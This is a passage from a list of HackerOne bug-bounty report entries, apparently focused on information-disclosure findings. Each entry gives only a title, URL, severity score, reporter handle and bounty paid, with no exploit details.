#### URL
https://hackerone.com/reports/151302
#### Severity score
null
#### Reporter
ahsan
### Bounty paid
null
---
### Title
Open aws s3 bucket s3://rubyci
#### URL
https://hackerone.com/reports/257276
#### Severity score
null
#### Reporter
sandeep_hodkasia
### Bounty paid
null
---
### Title
Internal IP Address Disclosure at https://www.lahitapiolarahoitus.fi/wp-json/wp/v2/pages
#### URL
https://hackerone.com/reports/329791
#### Severity score
null
#### Reporter
smokescreen
### Bounty paid
$50
---
### Title
Forum Users Information Disclosure
#### URL
https://hackerone.com/reports/321249
#### Severity score
null
#### Reporter
fahimeh
### Bounty paid
$300
---
### Title
Email enumeration
#### URL
https://hackerone.com/reports/2766
#### Severity score
null
#### Reporter
anshuman_bh
### Bounty paid
null
---
### Title
Misconfigured web directory allows to retrieve public proxy list
#### URL
https://hackerone.com/reports/791826
#### Severity score
null
#### Reporter
3viltwin
### Bounty paid
$50
---
### Title
Wordpress directories/files visible to internet
#### URL
https://hackerone.com/reports/201984
#### Severity score
null
#### Reporter
tk0
### Bounty paid
$600
---
### Title
16 instances where return value of OpenSSL i2d_RSAPublicKey is discarded -- might lead to use of uninitialized memory
#### URL
https://hackerone.com/reports/142773
#### Severity score
null
#### Reporter
guido
### Bounty paid
$200
---
### Title
Program Email Nofication settings ignored when being added as an external contributor
#### URL
https://hackerone.com/reports/645264
#### Severity score
3.4
#### Reporter
the_arch_angel
### Bounty paid
$500
---
### Title
Apache version disclosure
#### URL
https://hackerone.com/reports/139547
#### Severity score
null
#### Reporter
ignatius
### Bounty paid
null
---
### Title
Sql query disclosure,
#### URL
https://hackerone.com/reports/267922
#### Severity score
null
#### Reporter
utkarsh1
### Bounty paid
null
---
### Title
Раскрытие полного серверного пути
#### URL
https://hackerone.com/reports/15802
#### Severity score
null
#### Reporter
bigbear
### Bounty paid
null
---
### Title
Extracting private info of estimates.
#### URL
https://hackerone.com/reports/160981
#### Severity score
null
#### Reporter
bugdiscloseguys
### Bounty paid
$150
---
### Title
Information Disclosure on {http://pro.tracker.my.com}
#### URL
https://hackerone.com/reports/847276
#### Severity score
0
#### Reporter
dedsec69
### Bounty paid
null
---
### Title
Race condition in GitLab import, giving access to other people their imports due to filename collision
#### URL
https://hackerone.com/reports/214028
#### Severity score
3.7
#### Reporter
jobert
### Bounty paid
null
---
### Title
information disclosure
#### URL
https://hackerone.com/reports/78765
#### Severity score
null
#### Reporter
shekhar93
### Bounty paid
$50
---
### Title
Session cookie missing SecureFlag on git.edoverflow.com.
#### URL
https://hackerone.com/reports/345166
#### Severity score
null
#### Reporter
tangent90ninety
### Bounty paid
null
---
### Title
Full access at an internal service of Shopify
#### URL
https://hackerone.com/reports/216389
#### Severity score
null
#### Reporter
jamesclyde
### Bounty paid
$500
---
### Title
Controlled address leak due to type confusion - ASLR bypass
#### URL
https://hackerone.com/reports/207321
#### Severity score
null
#### Reporter
aerodudrizzt
### Bounty paid
$100
---
### Title
Error stack trace enabled
#### URL
https://hackerone.com/reports/74515
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
$50
---
### Title
Serving Transitions From: HTTP Protocol (not secure)
#### URL
https://hackerone.com/reports/14803
#### Severity score
null
#### Reporter
kmh127001
### Bounty paid
null
---
### Title
program_analytics_benchmarks query shows information not visible in public
#### URL
https://hackerone.com/reports/826176
#### Severity score
null
#### Reporter
0619
### Bounty paid
$500
---
### Title
Sensitive server-side/application information disclosure
#### URL
https://hackerone.com/reports/78012
#### Severity score
null
#### Reporter
sarwar_jahan_m
### Bounty paid
null
---
### Title
Disclosure of Users Information via Wordpress API (?rest_route)
#### URL
https://hackerone.com/reports/335341
#### Severity score
null
#### Reporter
victorrocha
### Bounty paid
$50
---
### Title
[Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image
#### URL
https://hackerone.com/reports/1021906
#### Severity score
null
#### Reporter
justmek
### Bounty paid
$2,900
---
### Title
Information Disclosure
#### URL
https://hackerone.com/reports/221333
#### Severity score
null
#### Reporter
secure_world
### Bounty paid
null
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/87505
#### Severity score
null
#### Reporter
ishahriyar
### Bounty paid
$25
---
### Title
Web Server Disclosure
#### URL
https://hackerone.com/reports/149327
#### Severity score
null
#### Reporter
12345678910
### Bounty paid
null
---
### Title
Information disclosure at https://blockchain.atlassian.net
#### URL
https://hackerone.com/reports/179599
#### Severity score
null
#### Reporter
lewerkun
### Bounty paid
$100
---
### Title
Android - Possible to intercept broadcasts about uploaded files
#### URL
https://hackerone.com/reports/167481
#### Severity score
null
#### Reporter
bagipro
### Bounty paid
null
---
### Title
stop serving grtp.co over HTTP
#### URL
https://hackerone.com/reports/117330
#### Severity score
null
#### Reporter
secbughunter
### Bounty paid
$1
---
### Title
Content-Injection/XSS ████
#### URL
https://hackerone.com/reports/205360
#### Severity score
null
#### Reporter
c0rte
### Bounty paid
null
---
### Title
WordPress username enumeration (/author)
#### URL
https://hackerone.com/reports/414427
#### Severity score
null
#### Reporter
rootbakar___
### Bounty paid
null
---
### Title
Information Exposure Through Directory Listing
#### URL
https://hackerone.com/reports/110655
#### Severity score
null
#### Reporter
erlijnvangenuchten
### Bounty paid
$250
---
### Title
SSRF allows access to internal services like Ganglia
#### URL
https://hackerone.com/reports/151086
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$729
---
### Title
blog.praca.olx.pl database credentials exposure
#### URL
https://hackerone.com/reports/448985
#### Severity score
null
#### Reporter
hdbreaker
### Bounty paid
null
---
### Title
Directory listing
#### URL
https://hackerone.com/reports/193753
#### Severity score
null
#### Reporter
c4pt4ink1dd
### Bounty paid
null
---
### Title
Information Disclosure
#### URL
https://hackerone.com/reports/941335
#### Severity score
null
#### Reporter
steal_wart
### Bounty paid
null
---
### Title
Publicly Accessible Datadog link
#### URL
https://hackerone.com/reports/345152
#### Severity score
0
#### Reporter
rijalrojan
### Bounty paid
$500
---
### Title
Username and sim id enum
#### URL
https://hackerone.com/reports/47358
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
null
---
### Title
OrderListInitial leaks order details
#### URL
https://hackerone.com/reports/882412
#### Severity score
5
#### Reporter
sreeju_kc
### Bounty paid
$1,500
---
### Title
Obtain the username & the uid of the one doing the S3 sync on Hackerone
#### URL
https://hackerone.com/reports/173175
#### Severity score
null
#### Reporter
rbcafe
### Bounty paid
null
---
### Title
Раскрытие IP, почты и другой полезной информации lootdog.io
#### URL
https://hackerone.com/reports/355948
#### Severity score
3.4
#### Reporter
circuit
### Bounty paid
$100
---
### Title
Information disclosure of website
#### URL
https://hackerone.com/reports/179121
#### Severity score
null
#### Reporter
1_1_1
### Bounty paid
null
---
### Title
Information Disclosure when /invitations/<token>.json is not yet accepted
#### URL
https://hackerone.com/reports/290930
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
User Information Disclosure via REST API
#### URL
https://hackerone.com/reports/197786
#### Severity score
null
#### Reporter
alykode
### Bounty paid
null
---
### Title
Registration enabled on ███grab.com
#### URL
https://hackerone.com/reports/318099
#### Severity score
null
#### Reporter
grouptherapy
### Bounty paid
$1,000
---
### Title
The session token in the URL
#### URL
https://hackerone.com/reports/341372
#### Severity score
null
#### Reporter
mandark
### Bounty paid
null
---
### Title
Admin Reseller Account Disclosure
#### URL
https://hackerone.com/reports/879562
#### Severity score
null
#### Reporter
stilou
### Bounty paid
null
---
### Title
Option method enabled (viestinta.lahitapiola.fi)
#### URL
https://hackerone.com/reports/182265
#### Severity score
null
#### Reporter
1_1_1
### Bounty paid
$60
---
### Title
SECRET_KEY Of Django Leaked In maps.me
#### URL
https://hackerone.com/reports/949686
#### Severity score
6.1
#### Reporter
sniper302
### Bounty paid
$150
---
### Title
Angular Expression Injection in the my.gmc.com Search Page
#### URL
https://hackerone.com/reports/124578
#### Severity score
null
#### Reporter
signalchaos
### Bounty paid
null
---
### Title
Api token exposed in Reverb.com's public github repository
#### URL
https://hackerone.com/reports/352623
#### Severity score
null
#### Reporter
albatraoz
### Bounty paid
$50
---
### Title
Information disclosure through directory listing at http://dockerhost01.maximum.nl:8080
#### URL
https://hackerone.com/reports/150905
#### Severity score
null
#### Reporter
lewerkun
### Bounty paid
$300
---
### Title
Unauthorized users may be able to view almost all informations related to Private projects.
#### URL
https://hackerone.com/reports/407763
#### Severity score
4.6
#### Reporter
8ayac
### Bounty paid
null
---
### Title
nextcloud.com: Directory listening for 'wp-includes' forders
#### URL
https://hackerone.com/reports/145495
#### Severity score
null
#### Reporter
zuh4n
### Bounty paid
null
---
### Title
Stealing Arbitrary Private Files of MyMail App
#### URL
https://hackerone.com/reports/365280
#### Severity score
6.5
#### Reporter
heeeeen
### Bounty paid
$500
---
### Title
Images and Subtitles Leakage from private videos
#### URL
https://hackerone.com/reports/136850
#### Severity score
null
#### Reporter
opnsec
### Bounty paid
$125
---
### Title
Расшифровка всех типов шифрованных ID
#### URL
https://hackerone.com/reports/402410
#### Severity score
null
#### Reporter
jarvis7
### Bounty paid
$320
---
### Title
Просмотр приватных видео записей у Пользователей
#### URL
https://hackerone.com/reports/317985
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$300
---
### Title
Possible to Upload Local Arbitrary Private File to the Cloud against User's Will
#### URL
https://hackerone.com/reports/384472
#### Severity score
2.5
#### Reporter
heeeeen
### Bounty paid
$150
---
### Title
Error stack trace
#### URL
https://hackerone.com/reports/46366
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
$10
---
### Title
Get ip and Geo location any user via Clickjacking with inspectlet technology
#### URL
https://hackerone.com/reports/998555
#### Severity score
null
#### Reporter
abosala7
### Bounty paid
null
---
### Title
Reputation gain split by company can be used to track the existence of otherwise undisclosed reports
#### URL
https://hackerone.com/reports/311449
#### Severity score
null
#### Reporter
aidantwoods
### Bounty paid
null
---
### Title
EXIF metadata not stripped from JPG group logos
#### URL
https://hackerone.com/reports/446238
#### Severity score
null
#### Reporter
jackb898
### Bounty paid
$500
---
### Title
[lootdog.io] User phone number disclosure
#### URL
https://hackerone.com/reports/470010
#### Severity score
0
#### Reporter
theappsec
### Bounty paid
$200
---
### Title
don't serve hidden files from Nginx
#### URL
https://hackerone.com/reports/120026
#### Severity score
null
#### Reporter
jsshen
### Bounty paid
$1
---
### Title
ImageMagick GIF coder vulnerability leading to memory disclosure
#### URL
https://hackerone.com/reports/302885
#### Severity score
3.8
#### Reporter
kunal94
### Bounty paid
$500
---
### Title
Numerous open ports/services
#### URL
https://hackerone.com/reports/8064
#### Severity score
null
#### Reporter
rajuraju14
### Bounty paid
null
---
### Title
Team object in GraphQL discloses team group names and permissions
#### URL
https://hackerone.com/reports/343464
#### Severity score
5
#### Reporter
haxta4ok00
### Bounty paid
$2,500
---
### Title
IDOR - Downloading all attachements if having access to a shared link
#### URL
https://hackerone.com/reports/194790
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$888
---
### Title
Version Disclosure (NginX)
#### URL
https://hackerone.com/reports/23447
#### Severity score
null
#### Reporter
stalker
### Bounty paid
null
---
### Title
don't allow directory browsing on grtp.co
#### URL
https://hackerone.com/reports/151295
#### Severity score
null
#### Reporter
zuh4n
### Bounty paid
null
---
### Title
Partial disclosure of report activity through new "Export as .zip" feature
#### URL
https://hackerone.com/reports/182358
#### Severity score
7.5
#### Reporter
faisalahmed
### Bounty paid
$10,000
---
### Title
[sso.33slona.ru] Application Messages Error stacktrace PHP.
#### URL
https://hackerone.com/reports/666065
#### Severity score
null
#### Reporter
iframe
### Bounty paid
$400
---
### Title
Kaspersky Password Manager allows websites to access user's address data
#### URL
https://hackerone.com/reports/430854
#### Severity score
null
#### Reporter
palant
### Bounty paid
$300
---
### Title
Full path + some back-end code disclosure
#### URL
https://hackerone.com/reports/149212
#### Severity score
null
#### Reporter
strukt
### Bounty paid
null
---
### Title
Sensitive Information Disclosure
#### URL
https://hackerone.com/reports/963352
#### Severity score
null
#### Reporter
exploit_db
### Bounty paid
null
---
### Title
Lahitapiola´s customer names send to 3rd party
#### URL
https://hackerone.com/reports/177523
#### Severity score
null
#### Reporter
billy_blaze
### Bounty paid
$588
---
### Title
page_controls_menu_js can reveal collection version of page
#### URL
https://hackerone.com/reports/4938
#### Severity score
null
#### Reporter
mnkras
### Bounty paid
null
---
### Title
Ability to collect users' ids that have visited a specific web page with malicious code
#### URL
https://hackerone.com/reports/139192
#### Severity score
null
#### Reporter
saeedhashem
### Bounty paid
$280
---
### Title
Basic auth details is still work on report ( 351555 )
#### URL
https://hackerone.com/reports/367581
#### Severity score
null
#### Reporter
m7mdharoun
### Bounty paid
$100
---
### Title
Lighttpd version disclosure / directory listing
#### URL
https://hackerone.com/reports/6371
#### Severity score
null
#### Reporter
internetwache
### Bounty paid
null
---
### Title
PII leakage due to caching of Order/Contract ID's on █████████
#### URL
https://hackerone.com/reports/374007
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Base alpha version code exposure
#### URL
https://hackerone.com/reports/167859
#### Severity score
null
#### Reporter
cha5m
### Bounty paid
$500
---
### Title
Linux TBB SFTP URI allows local IP disclosure
#### URL
https://hackerone.com/reports/253429
#### Severity score
null
#### Reporter
julianjackson
### Bounty paid
$3,000
---
### Title
Differential "Show Raw File" feature exposes generated files to unauthorised users
#### URL
https://hackerone.com/reports/213942
#### Severity score
4.8
#### Reporter
calvium
### Bounty paid
$600
---
### Title
Exploiting Misconfigured CORS to Steal User Information
#### URL
https://hackerone.com/reports/317391
#### Severity score
null
#### Reporter
1hack0
### Bounty paid
$500
---
### Title
Apache server-info enabled
#### URL
https://hackerone.com/reports/424882
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
[mobs.mail.ru] nginx path traversal via misconfigured alias
#### URL
https://hackerone.com/reports/312510
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Web Server information disclosure.
#### URL
https://hackerone.com/reports/42780
#### Severity score
null
#### Reporter
xavinux
### Bounty paid
null
---
### Title
Определение id по номеру телефона
#### URL
https://hackerone.com/reports/331040
#### Severity score
null
#### Reporter
arhimason
### Bounty paid
$5,000
---
### Title
[sms-be-vip.twitter.com] vulnerable to Jetleak
#### URL
https://hackerone.com/reports/143935
#### Severity score
null
#### Reporter
molejarka
### Bounty paid
$1,260
---
### Title
information disclose
#### URL
https://hackerone.com/reports/135782
#### Severity score
null
#### Reporter
dotnick
### Bounty paid
$25
---
### Title
SSRF vulnerablity in app webhooks
#### URL
https://hackerone.com/reports/56828
#### Severity score
null
#### Reporter
haquaman
### Bounty paid
$512
---
### Title
Unauthenticated LFI revealing log information
#### URL
https://hackerone.com/reports/272578
#### Severity score
null
#### Reporter
juji
### Bounty paid
$4,000
---
### Title
Disclosure of ip addresses in local network of uber
#### URL
https://hackerone.com/reports/126569
#### Severity score
null
#### Reporter
laps-forever
### Bounty paid
null
---
### Title
server calendar and server status available to public
#### URL
https://hackerone.com/reports/116621
#### Severity score
null
#### Reporter
bulla
### Bounty paid
null
---
### Title
Information Disclosure PHPpgAdmin
#### URL
https://hackerone.com/reports/463177
#### Severity score
null
#### Reporter
mazmur
### Bounty paid
null
---
### Title
server version dislosure
#### URL
https://hackerone.com/reports/179217
#### Severity score
null
#### Reporter
goodman97
### Bounty paid
$50
---
### Title
Insecure Direct 'org-invite-log' References
#### URL
https://hackerone.com/reports/123712
#### Severity score
null
#### Reporter
zuh4n
### Bounty paid
null
---
### Title
F5 BIG-IP Cookie Remote Information Disclosure
#### URL
https://hackerone.com/reports/330716
#### Severity score
null
#### Reporter
petruknisme
### Bounty paid
$50
---
### Title
Email information leakage for certain addresses
#### URL
https://hackerone.com/reports/169992
#### Severity score
null
#### Reporter
procode701
### Bounty paid
$400
---
### Title
De-anonymization by visiting specially crafted bookmark.
#### URL
https://hackerone.com/reports/294364
#### Severity score
null
#### Reporter
qab
### Bounty paid
null
---
### Title
HTTP status code manipluation & java stack trace
#### URL
https://hackerone.com/reports/135192
#### Severity score
null
#### Reporter
ras-it
### Bounty paid
$100
---
### Title
Unauthorized user can obtain `report_sources` attribute through Team GraphQL object
#### URL
https://hackerone.com/reports/770209
#### Severity score
5
#### Reporter
haxta4ok00
### Bounty paid
$2,500
---
### Title
Leaking license key in source code
#### URL
https://hackerone.com/reports/154855
#### Severity score
null
#### Reporter
pradeepch99
### Bounty paid
null
---
### Title
Number, username and name disclosure
#### URL
https://hackerone.com/reports/45243
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
null
---
### Title
Firewall rules for ████████ can be bypassed to leak site authors
#### URL
https://hackerone.com/reports/743643
#### Severity score
null
#### Reporter
nrockhouse
### Bounty paid
null
---
### Title
Git repository found
#### URL
https://hackerone.com/reports/248693
#### Severity score
7.5
#### Reporter
linkks
### Bounty paid
$1,000
---
### Title
Connect-only connections can use the wrong connection
#### URL
https://hackerone.com/reports/948876
#### Severity score
null
#### Reporter
m42a
### Bounty paid
$500
---
### Title
Information disclosure on https://paycard.rapida.ru
#### URL
https://hackerone.com/reports/299552
#### Severity score
null
#### Reporter
tikoo_sahil
### Bounty paid
$100
---
### Title
SSRF vulnerability (access to metadata server on EC2 and OpenStack)
#### URL
https://hackerone.com/reports/53088
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$300
---
### Title
Github information leaked
#### URL
https://hackerone.com/reports/676212
#### Severity score
null
#### Reporter
farmsec_alice
### Bounty paid
$3,000
---
### Title
Leaking of password reset token through referer
#### URL
https://hackerone.com/reports/13557
#### Severity score
null
#### Reporter
robin
### Bounty paid
null
---
### Title
Watch any Password Video without password
#### URL
https://hackerone.com/reports/155618
#### Severity score
null
#### Reporter
opnsec
### Bounty paid
$500
---
### Title
User Information sent to client through websockets
#### URL
https://hackerone.com/reports/163464
#### Severity score
null
#### Reporter
cablej
### Bounty paid
$120
---
### Title
Apache Server Version Disclousure
#### URL
https://hackerone.com/reports/406388
#### Severity score
null
#### Reporter
mazmur
### Bounty paid
null
---
### Title
dashboard/pages/types [Unknown column 'Array' in 'where clause'] disclosure.
#### URL
https://hackerone.com/reports/4811
#### Severity score
null
#### Reporter
smiegles
### Bounty paid
null
---
### Title
User Information Disclosure via REST API
#### URL
https://hackerone.com/reports/197877
#### Severity score
null
#### Reporter
xploitt
### Bounty paid
null
---
### Title
[gratipay.com] Cross Site Tracing
#### URL
https://hackerone.com/reports/152834
#### Severity score
null
#### Reporter
ahsan
### Bounty paid
null
---
### Title
File Name Enumeration
#### URL
https://hackerone.com/reports/33935
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
$500
---
### Title
Security.allowDomain("*") in SWFs on img.autos.yahoo.com allows data theft from Yahoo Mail (and others)
#### URL
https://hackerone.com/reports/1171
#### Severity score
null
#### Reporter
jordanmilne
### Bounty paid
$2,500
---
### Title
Private account causes displayed through API
#### URL
https://hackerone.com/reports/826005
#### Severity score
null
#### Reporter
ech0bh
### Bounty paid
null
---
### Title
Full Path Disclousure on https://airship.paragonie.com
#### URL
https://hackerone.com/reports/226514
#### Severity score
null
#### Reporter
ruisilva
### Bounty paid
null
---
### Title
Distinguish EP+Private vs Private programs in HackerOne
#### URL
https://hackerone.com/reports/118965
#### Severity score
null
#### Reporter
nismo
### Bounty paid
$500
---
### Title
PII disclosure -- Past team members & their email ID(personal email) can be viewed by Staff member with no permissions on Partner Dashboard
#### URL
https://hackerone.com/reports/415622
#### Severity score
null
#### Reporter
h13-
### Bounty paid
$500
---
### Title
See details of a unpublished word by guessing the word ID
#### URL
https://hackerone.com/reports/311380
#### Severity score
null
#### Reporter
tyagiji
### Bounty paid
null
---
### Title
ImageMagick GIF coder vulnerability leading to memory disclosure
#### URL
https://hackerone.com/reports/315256
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
$1,000
---
### Title
SSH Port Wide Open
#### URL
https://hackerone.com/reports/11951
#### Severity score
null
#### Reporter
rajuraju14
### Bounty paid
null
---
### Title
Outdated Jenkins server hosted at OwnCloud.org
#### URL
https://hackerone.com/reports/208566
#### Severity score
null
#### Reporter
computer-engineer
### Bounty paid
null
---
### Title
Insecure Direct 'org-visitor-log' References
#### URL
https://hackerone.com/reports/123713
#### Severity score
null
#### Reporter
zuh4n
### Bounty paid
null
---
### Title
localStorage не чистится после выхода
#### URL
https://hackerone.com/reports/8846
#### Severity score
null
#### Reporter
kamil_hism
### Bounty paid
$150
---
### Title
Sensitive Information Disclosure on https://nordvpn.com/
#### URL
https://hackerone.com/reports/801197
#### Severity score
null
#### Reporter
01alsanosi
### Bounty paid
null
---
### Title
Internal attachments can be exported via "Export as .zip" feature
#### URL
https://hackerone.com/reports/186230
#### Severity score
7.5
#### Reporter
japz
### Bounty paid
$12,500
---
### Title
Leaked DB credentials on https://██████████.mil/███
#### URL
https://hackerone.com/reports/761790
#### Severity score
null
#### Reporter
al-madjus
### Bounty paid
null
---
### Title
SSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing
#### URL
https://hackerone.com/reports/237381
#### Severity score
null
#### Reporter
neex
### Bounty paid
$800
---
### Title
Часть админки доступна для всех пользователей
#### URL
https://hackerone.com/reports/341637
#### Severity score
null
#### Reporter
trainzment
### Bounty paid
$100
---
### Title
RelateIQ GWT based application visible to unauthenticated users
#### URL
https://hackerone.com/reports/3432
#### Severity score
null
#### Reporter
anshuman_bh
### Bounty paid
null
---
### Title
Full Path Disclosure / Info Disclosure in Importing XML Section!
#### URL
https://hackerone.com/reports/8091
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
null
---
### Title
Name, email, phone and more disclosure on user ID (API)
#### URL
https://hackerone.com/reports/171917
#### Severity score
null
#### Reporter
url
### Bounty paid
null
---
### Title
Перечисление каталогов за счёт уязвимости в IIS
#### URL
https://hackerone.com/reports/15652
#### Severity score
null
#### Reporter
bigbear
### Bounty paid
null
---
### Title
GitHub API Key for BrewTestBot is publicly exposed
#### URL
https://hackerone.com/reports/388740
#### Severity score
null
#### Reporter
ejholmes
### Bounty paid
null
---
### Title
Nickname disclosure through web-chat
#### URL
https://hackerone.com/reports/569350
#### Severity score
null
#### Reporter
circuit
### Bounty paid
$150
---
### Title
Attacker can access graphic representation of every query
#### URL
https://hackerone.com/reports/149914
#### Severity score
null
#### Reporter
jobert
### Bounty paid
$1,000
---
### Title
leaking Digits OAuth authorization to third party websites
#### URL
https://hackerone.com/reports/166942
#### Severity score
null
#### Reporter
akhil-reni
### Bounty paid
$560
---
### Title
[special.mail.ru] Information Disclosure
#### URL
https://hackerone.com/reports/520883
#### Severity score
5.3
#### Reporter
bobrov
### Bounty paid
$500
---
### Title
Attacker can claim credentials for private program that has a published external program
#### URL
https://hackerone.com/reports/449680
#### Severity score
6.4
#### Reporter
jobert
### Bounty paid
null
---
### Title
Information Disclosure Microsoft IIS Server service.cnf in a mtn website
#### URL
https://hackerone.com/reports/767066
#### Severity score
null
#### Reporter
miguel_santareno
### Bounty paid
null
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/196482
#### Severity score
null
#### Reporter
joshualaurencio
### Bounty paid
null
---
### Title
directory information disclose
#### URL
https://hackerone.com/reports/226212
#### Severity score
null
#### Reporter
test_this
### Bounty paid
null
---
### Title
[Quora Android] Possible to steal arbitrary files from mobile device
#### URL
https://hackerone.com/reports/258460
#### Severity score
null
#### Reporter
bagipro
### Bounty paid
$500
---
### Title
information disclosure which leak the apache version
#### URL
https://hackerone.com/reports/460530
#### Severity score
null
#### Reporter
hamzamn2098
### Bounty paid
null
---
### Title
Full path disclosure
#### URL
https://hackerone.com/reports/143575
#### Severity score
null
#### Reporter
fnqgpc
### Bounty paid
null
---
### Title
The "Download Raw Diff" URL is viewable by everyone
#### URL
https://hackerone.com/reports/356408
#### Severity score
null
#### Reporter
xiaoyinl
### Bounty paid
null
---
### Title
Missing Rate Limiting on https://twitter.com/account/complete
#### URL
https://hackerone.com/reports/27166
#### Severity score
null
#### Reporter
surgent10cross
### Bounty paid
$140
---
### Title
Ngnix Server version disclosure 404 Page!
#### URL
https://hackerone.com/reports/167036
#### Severity score
null
#### Reporter
khizer47
### Bounty paid
null
---
### Title
Inline banner on Report page discloses whether organization runs a private program
#### URL
https://hackerone.com/reports/452973
#### Severity score
3.1
#### Reporter
haxta4ok00
### Bounty paid
$500
---
### Title
Password authentication at newsletter.nextcloud.com discloses username list
#### URL
https://hackerone.com/reports/476439
#### Severity score
null
#### Reporter
th3last1
### Bounty paid
null
---
### Title
Discloser of Internal Ip address
#### URL
https://hackerone.com/reports/518942
#### Severity score
null
#### Reporter
ghostin
### Bounty paid
null
---
### Title
Uninitialized server memory disclosure via ImageMagick gif parser
#### URL
https://hackerone.com/reports/284155
#### Severity score
null
#### Reporter
chaosbolt
### Bounty paid
$1,500
---
### Title
https://rpm.newrelic.com/.htaccess file is world readable
#### URL
https://hackerone.com/reports/123074
#### Severity score
null
#### Reporter
geeknik
### Bounty paid
null
---
### Title
Customer private program can disclose email any users through invited via username
#### URL
https://hackerone.com/reports/807448
#### Severity score
7.5
#### Reporter
haxta4ok00
### Bounty paid
$7,500
---
### Title
Default /docs folder of PHPBB3 installation on gamesnet.yahoo.com
#### URL
https://hackerone.com/reports/17506
#### Severity score
null
#### Reporter
march
### Bounty paid
$50
---
### Title
Fetching external resources through svg images
#### URL
https://hackerone.com/reports/142709
#### Severity score
null
#### Reporter
detroitsmash
### Bounty paid
$500
---
### Title
CVE-2017-15277 on Profile page
#### URL
https://hackerone.com/reports/315906
#### Severity score
null
#### Reporter
emitrani
### Bounty paid
null
---
### Title
Disclosure of Github Issues
#### URL
https://hackerone.com/reports/425719
#### Severity score
6.1
#### Reporter
rijalrojan
### Bounty paid
$500
---
### Title
(m.mail.ru) Password type input with auto-complete enabled
#### URL
https://hackerone.com/reports/13200
#### Severity score
null
#### Reporter
vineet
### Bounty paid
null
---
### Title
Leak Sensetive Data at face.city-mobil.ru
#### URL
https://hackerone.com/reports/756879
#### Severity score
6.1
#### Reporter
r0hack
### Bounty paid
$500
---
### Title
An invite-only's program submission state is accessible to users no longer part of the program
#### URL
https://hackerone.com/reports/800109
#### Severity score
3.8
#### Reporter
d4rk_g1rl
### Bounty paid
$500
---
### Title
Token leakage by referrer
#### URL
https://hackerone.com/reports/213936
#### Severity score
null
#### Reporter
mostafamamdoh
### Bounty paid
$60
---
### Title
WordPress User Enumeration - blog.newrelic.com
#### URL
https://hackerone.com/reports/115817
#### Severity score
null
#### Reporter
niwasaki
### Bounty paid
null
---
### Title
Internal server error 500 at log.veris.in
#### URL
https://hackerone.com/reports/157986
#### Severity score
null
#### Reporter
ak1t4
### Bounty paid
null
---
### Title
Private Key exposed in Travis Log can Compromise all the test servers.
#### URL
https://hackerone.com/reports/638401
#### Severity score
null
#### Reporter
hayageek
### Bounty paid
$100
---
### Title
GraphQL node interface for ActiveResource models lacks encoding for resource identifier, enabling parameter injection in Payments backend
#### URL
https://hackerone.com/reports/800231
#### Severity score
6.1
#### Reporter
jobert
### Bounty paid
null
---
### Title
Verbose SQL error messages
#### URL
https://hackerone.com/reports/20279
#### Severity score
null
#### Reporter
bitquark
### Bounty paid
null
---
### Title
Selecting encryption for email with drive attachment overrides the drive email password
#### URL
https://hackerone.com/reports/180037
#### Severity score
null
#### Reporter
haquaman
### Bounty paid
$100
---
### Title
Unauthenticated 'display name' information leak on enumeration of login names
#### URL
https://hackerone.com/reports/237232
#### Severity score
5.3
#### Reporter
frankspierings
### Bounty paid
null
---
### Title
The request tells the number of private programs, the new system of authorization /invite/token
#### URL
https://hackerone.com/reports/310946
#### Severity score
4.3
#### Reporter
haxta4ok00
### Bounty paid
$2,000
---
### Title
Using nmap revealing sensitive information
#### URL
https://hackerone.com/reports/18382
#### Severity score
null
#### Reporter
vineet
### Bounty paid
null
---
### Title
Open port leads to information disclosure
#### URL
https://hackerone.com/reports/223421
#### Severity score
null
#### Reporter
str33
### Bounty paid
null
---
### Title
Protected tweets exposure through the URL
#### URL
https://hackerone.com/reports/491473
#### Severity score
null
#### Reporter
terjanq
### Bounty paid
$560
---
### Title
User credentials leak and arbitrary local file read/leak due to same-origin-policy violation
#### URL
https://hackerone.com/reports/136454
#### Severity score
null
#### Reporter
bjornruytenberg
### Bounty paid
$3,000
---
### Title
lert.uber.com: Few default folders/files of AURA Framework are accessible
#### URL
https://hackerone.com/reports/195205
#### Severity score
null
#### Reporter
filedescryptor
### Bounty paid
null
---
### Title
Development configuration file
#### URL
https://hackerone.com/reports/231267
#### Severity score
null
#### Reporter
protector47
### Bounty paid
null
---
### Title
Bash History file log
#### URL
https://hackerone.com/reports/671939
#### Severity score
null
#### Reporter
iframe
### Bounty paid
null
---
### Title
Wordpress Users Disclosure (/wp-json/wp/v2/users/) on data.gov
#### URL
https://hackerone.com/reports/942481
#### Severity score
null
#### Reporter
nagli
### Bounty paid
null
---
### Title
Possibility to get private email using UUID
#### URL
https://hackerone.com/reports/127158
#### Severity score
null
#### Reporter
shmoo
### Bounty paid
$5,000
---
### Title
Flash Local Sandbox Bypass
#### URL
https://hackerone.com/reports/27651
#### Severity score
null
#### Reporter
kinine
### Bounty paid
$1,000
---
### Title
Доступ к администраторским faq
#### URL
https://hackerone.com/reports/370629
#### Severity score
null
#### Reporter
executor
### Bounty paid
$500
---
### Title
Insecure crossdomain.xml
#### URL
https://hackerone.com/reports/44652
#### Severity score
null
#### Reporter
smiegles
### Bounty paid
null
---
### Title
Incorrect logic in MySQL & MariaDB protocol leads to remote SSRF/Remote file read
#### URL
https://hackerone.com/reports/156511
#### Severity score
null
#### Reporter
squashbroom
### Bounty paid
null
---
### Title
Information Disclosure in AWS S3 Bucket
#### URL
https://hackerone.com/reports/163476
#### Severity score
null
#### Reporter
ysx
### Bounty paid
$20
---
### Title
